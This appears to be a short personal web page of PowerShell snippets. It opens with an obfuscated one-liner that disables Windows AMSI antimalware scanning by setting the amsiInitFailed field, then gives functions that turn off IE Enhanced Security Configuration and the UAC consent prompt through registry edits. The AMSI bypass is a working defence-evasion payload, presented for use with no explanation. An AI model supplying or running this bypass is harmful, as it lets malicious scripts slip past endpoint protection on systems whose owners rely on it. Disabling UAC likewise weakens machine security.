<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Powershell - Quickies</title>
</head><body><b><u>Disable AMSI</u></b><br/>
<br/>
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )<br/>
<br/>
<b><u>Disable IE security on servers</u></b><br/>
<br/>
function Disable-InternetExplorerESC {<br/>
&nbsp; &nbsp; $AdminKey = "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}"<br/>
&nbsp; &nbsp; $UserKey = "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{A509B1A8-37EF-4b3f-8CFC-4F3A74704073}"<br/>
&nbsp; &nbsp; Set-ItemProperty -Path $AdminKey -Name "IsInstalled" -Value 0<br/>
&nbsp; &nbsp; Set-ItemProperty -Path $UserKey -Name "IsInstalled" -Value 0<br/>
&nbsp; &nbsp; Stop-Process -Name Explorer<br/>
&nbsp; &nbsp; Write-Host "IE Enhanced Security Configuration (ESC) has been disabled." -ForegroundColor Green<br/>
}<br/>
<br/>
<b><u>Enable IE Security on servers</u></b><br/>
<br/>
function Enable-InternetExplorerESC {<br/>
&nbsp; &nbsp; $AdminKey = "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}"<br/>
&nbsp; &nbsp; $UserKey = "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{A509B1A8-37EF-4b3f-8CFC-4F3A74704073}"<br/>
&nbsp; &nbsp; Set-ItemProperty -Path $AdminKey -Name "IsInstalled" -Value 1<br/>
&nbsp; &nbsp; Set-ItemProperty -Path $UserKey -Name "IsInstalled" -Value 1<br/>
&nbsp; &nbsp; Stop-Process -Name Explorer<br/>
&nbsp; &nbsp; Write-Host "IE Enhanced Security Configuration (ESC) has been enabled." -ForegroundColor Green<br/>
}<br/>
<br/>
<br/>
<b><u>Disable UAC</u></b><br/>
<br/>
function Disable-UserAccessControl {<br/>
&nbsp; &nbsp; Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 00000000<br/>
&nbsp; &nbsp; Write-Host "User Access Control (UAC) has been disabled." -ForegroundColor Green &nbsp; &nbsp;<br/>
}<br/>
<br/>
</body></html>